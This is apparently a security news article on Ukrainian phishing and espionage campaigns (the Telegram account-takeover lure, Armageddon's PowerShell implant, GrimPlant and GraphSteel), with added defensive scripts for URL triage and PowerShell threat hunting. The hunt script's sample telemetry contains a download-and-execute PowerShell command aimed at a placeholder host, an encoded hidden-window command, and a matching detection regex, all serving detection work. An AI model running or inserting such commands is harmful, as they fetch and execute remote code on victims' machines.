Ukraine’s intelligence and technical security service warns of a new wave of cyber attacks aimed at gaining access to users’ Telegram accounts.
“Criminals sent messages with malicious links to the Telegram website to gain unauthorized access to records, including the possibility of transferring a one-time code from SMS,” Ukraine's State Service of Special Communication and Information Protection (SSSCIP) said in an alert.
The attacks, which have been attributed to a threat group tracked as “UAC-0094”, originate with Telegram messages alerting recipients that a login has been detected from a new device located in Russia and urging them to confirm their accounts by clicking a link.
The URL, actually a phishing domain, prompts victims to enter their phone numbers as well as one-time passwords sent via SMS that attackers then use to take over accounts.
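The lure described above works only because the link looks like it belongs to Telegram. The following Python script is an added example (not code from SSSCIP or the article) showing how a defender or mail/chat gateway can triage the URLs in such a message: every host is compared against a small assumed allowlist of real Telegram hosts, and anything that imitates them (brand name in a foreign domain, a legitimate host hidden in the userinfo part of the URL, or a punycode label) is flagged as a lookalike. The message text and all non-Telegram domains are constructed for the demo and are not real indicators from the campaign.

```python
"""Triage URLs found in a "new login detected" style Telegram message.

Added example for this article; it is not code from SSSCIP or CERT-UA.
The sample message and every non-Telegram domain in it are constructed
for the demo and are not real indicators from the campaign.
"""
import re
from urllib.parse import urlsplit

# Hosts Telegram itself uses (assumed allowlist; extend for your own
# environment). Anything else that imitates them is treated as a lookalike.
LEGIT_HOSTS = {"telegram.org", "telegram.me", "t.me"}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Constructed message in the style of the lure described in the article.
SAMPLE_MESSAGE = (
    "New login detected from a device in Russia. If this was not you, "
    "confirm your account at https://telegram-login.example/confirm."
)


def _is_legit(host: str) -> bool:
    """True for a legitimate host or any subdomain of one (e.g. web.telegram.org)."""
    return any(host == h or host.endswith("." + h) for h in LEGIT_HOSTS)


def classify_link(url: str) -> str:
    """Return 'legit', 'lookalike' or 'unrelated' for one URL.

    'lookalike' covers the usual phishing-domain tricks:
      - the brand name inside a non-Telegram domain (telegram-login.example)
      - a legitimate host in the userinfo part (https://telegram.org@evil.example)
      - punycode labels (xn--...), which render as confusable Unicode
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()  # hostname drops userinfo and port
    if _is_legit(host):
        return "legit"
    userinfo = parts.netloc.rsplit("@", 1)[0].lower() if "@" in parts.netloc else ""
    if any(label.startswith("xn--") for label in host.split(".")):
        return "lookalike"
    if any(h in userinfo for h in LEGIT_HOSTS):
        return "lookalike"
    # Normalise common digit-for-letter swaps and hyphens before brand matching.
    normalised = host.replace("-", "").replace("1", "l").replace("0", "o")
    if "telegram" in normalised:
        return "lookalike"
    return "unrelated"


def triage_message(text: str) -> dict:
    """Map every URL in the message to its verdict, trimming trailing punctuation."""
    return {u.rstrip(".,);"): classify_link(u.rstrip(".,);")) for u in URL_RE.findall(text)}


if __name__ == "__main__":
    for url, verdict in triage_message(SAMPLE_MESSAGE).items():
        print(f"{verdict:10} {url}")
```

The allowlist approach is deliberately strict: a host is only "legit" if it is, or is a subdomain of, a known Telegram domain, so `telegram.org.evil.example` is caught even though it starts with the real name. Punycode is flagged outright because a Telegram login notice has no reason to point at an internationalised domain.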
The modus operandi mirrors that of a previous phishing attack disclosed in early March that abused compromised inboxes belonging to different Indian entities to send phishing emails to Ukr.net users in order to hijack their accounts.
In another social engineering campaign observed by the Computer Emergency Response Team of Ukraine (CERT-UA), war-related email lures were sent to Ukrainian government agencies to deploy a piece of espionage malware.
The emails come with an attached HTML file (“War Criminals of the Russian Federation.htm”) that ultimately leads to the download and execution of a PowerShell-based implant on the infected host.
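The chain above (a mailed HTML attachment opened by the user, ending in PowerShell running an implant) leaves a distinctive parent/child process relationship in endpoint telemetry. The following Python script is an added example (not code from CERT-UA) of a simple hunt over process-creation events: it flags PowerShell launched by a process that renders HTML, or launched with argument patterns that rarely occur in legitimate interactive use. The event records are constructed in a Sysmon Event ID 1 style and are not real logs from the campaign; the encoded command string is a placeholder.

```python
"""Hunt for the HTML-attachment -> PowerShell execution chain.

Added example; not code from CERT-UA. The events below are constructed
to resemble process-creation telemetry (Sysmon Event ID 1 field names)
and are not real logs from the campaign.
"""
import re

# Processes that would render a mailed .htm attachment when double-clicked.
HTML_HANDLERS = {"msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Argument patterns rarely seen in legitimate interactive PowerShell use:
# encoded commands, hidden windows, no-profile, remote download + eval.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\w*|-w(indowstyle)?\s+hidden|-nop\w*|downloadstring|\biex\b|invoke-expression)",
    re.IGNORECASE,
)

# Constructed sample events (not real telemetry).
EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},                                   # admin opened a console
    {"EventId": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc UExBQ0VIT0xERVJfQkFTRTY0X1BBWUxPQUQ="},  # placeholder
    {"EventId": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},  # scheduled task
    {"EventId": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://placeholder.example/x')"},
    {"EventId": 5, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "notepad.exe downloaded.txt"},
]


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def reasons_for(event: dict) -> list:
    """Return the list of reasons an event is suspicious (empty if benign)."""
    if _basename(event["Image"]) not in POWERSHELL:
        return []
    reasons = []
    if _basename(event["ParentImage"]) in HTML_HANDLERS:
        reasons.append("powershell spawned by an HTML-rendering process")
    match = SUSPICIOUS_ARGS.search(event["CommandLine"])
    if match:
        reasons.append(f"suspicious argument: {match.group(0)}")
    return reasons


def find_suspicious(events: list) -> dict:
    """Map EventId -> reasons for every event worth an analyst's attention."""
    return {e["EventId"]: r for e in events if (r := reasons_for(e))}


if __name__ == "__main__":
    for event_id, reasons in find_suspicious(EVENTS).items():
        print(event_id, "; ".join(reasons))
```

Either condition alone is worth a look, but the combination (browser or mshta parent plus encoded or hidden-window arguments) is the high-confidence signal for the chain described in the article; the benign console and scheduled-task events show why the parent check and the argument check are kept separate rather than matching on PowerShell alone.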
CERT-UA attributed the attack to Armageddon, a Russia-based threat actor linked to the Federal Security Service (FSB) that has a history of targeting Ukrainian entities since at least 2013.
In February 2022, the hacking group was connected with espionage attacks targeting the government, the military, non-governmental organizations (NGOs), the judiciary, law enforcement, and non-profit organizations with the primary goal of exfiltrating confidential information.
Armageddon, also known by the nickname Gamaredon, is also believed to have identified Latvian government officials as part of a related phishing attack towards the end of March 2022, employing war-themed RAR files to deliver malware.
Other phishing campaigns documented by CERT-UA in recent weeks have deployed a variety of malware, including GraphSteel, GrimPlant, HeaderTip, LoadEdge and SPECTRUM, not to mention a Ghostwriter-led operation to install the Cobalt Strike post-exploitation framework.
The GrimPlant and GraphSteel attacks, associated with a threat actor named UAC-0056 (also known as SaintBear, UNC2589 and TA471), are believed to have started in early February 2022, according to SentinelOne, which described the payloads as malicious binaries designed to perform reconnaissance, harvest credentials, and execute arbitrary commands.
SaintBear is also assessed to have been behind the WhisperGate activity in early January 2022 that impacted government agencies in Ukraine, with the actor preparing the infrastructure for the GrimPlant and GraphSteel campaign starting in December 2021.
In the past week, Malwarebytes Labs has implicated the hacking group in a new series of attacks in late March targeting Ukrainian organizations, including a private TV channel called ICTV, via a phishing lure containing macro-embedded Excel documents that led to the distribution of the GrimPlant backdoor (also known as Elephant Implant).
The disclosure comes as various advanced persistent threat (APT) groups from Iran, China, North Korea, and Russia have capitalized on the ongoing Russo-Ukrainian war as a pretext to backdoor victim networks and carry out other malicious activities.